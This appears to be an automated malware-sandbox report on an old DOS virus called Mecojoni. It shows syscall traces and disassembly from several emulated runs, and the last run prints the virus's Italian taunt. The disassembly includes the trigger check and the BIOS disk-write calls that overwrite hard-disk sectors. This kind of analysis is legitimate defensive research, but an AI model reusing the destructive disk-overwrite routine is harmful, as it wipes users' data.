Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.f

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:20:16.319045847Z 74 PC: 12d1b | Reallocate memory
2018-12-17T22:20:16.3210149Z 72 PC: 12d22 | Allocate memory
2018-12-17T22:20:16.323792819Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x12
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-17T22:20:16.326475017Z 72 PC: 13262 | Allocate memory
2018-12-17T22:20:16.328513041Z 75 PC: 1329d | Execute program
2018-12-17T22:20:16.345764405Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T22:20:16.349334173Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:16.350985918Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:16.353297139Z 77 PC: 132cc | Get program return code
2018-12-17T22:20:16.354977055Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3510,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:23.799574531Z 74 PC: 12d1b | Reallocate memory
2018-12-25T11:49:23.801522899Z 72 PC: 12d22 | Allocate memory
2018-12-25T11:49:23.803358018Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x12
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T11:49:23.805756375Z 72 PC: 13262 | Allocate memory
2018-12-25T11:49:23.808287527Z 75 PC: 1329d | Execute program
2018-12-25T11:49:23.823813529Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-25T11:49:23.830981601Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:23.832598947Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:23.833998756Z 77 PC: 132cc | Get program return code
2018-12-25T11:49:23.835285121Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":18,"Second":0,"TimeBased":true,"OriginalID":3510,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:24.888304817Z 74 PC: 12d1b | Reallocate memory
2018-12-25T11:49:24.890296713Z 72 PC: 12d22 | Allocate memory
2018-12-25T11:49:24.893138912Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x12
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T11:49:25.228286844Z 9 PC: 13489 | Display string (String= 'Ti sentivi sicuro. Avevi lo SCAN !!! Invece lo hai preso nel culo. Infatti il')
2018-12-25T11:49:25.235026633Z 9 PC: 13490 | Display string (String= 'virus MECOJONI ti ha formattato l Hard disk. MECOJONI � un virus self-modifying!')
2018-12-25T11:49:25.242215609Z 9 PC: 13497 | Display string (String= 'Ricordati che la tua presunzione di conoscere i virus � una follia. Arrivederci.')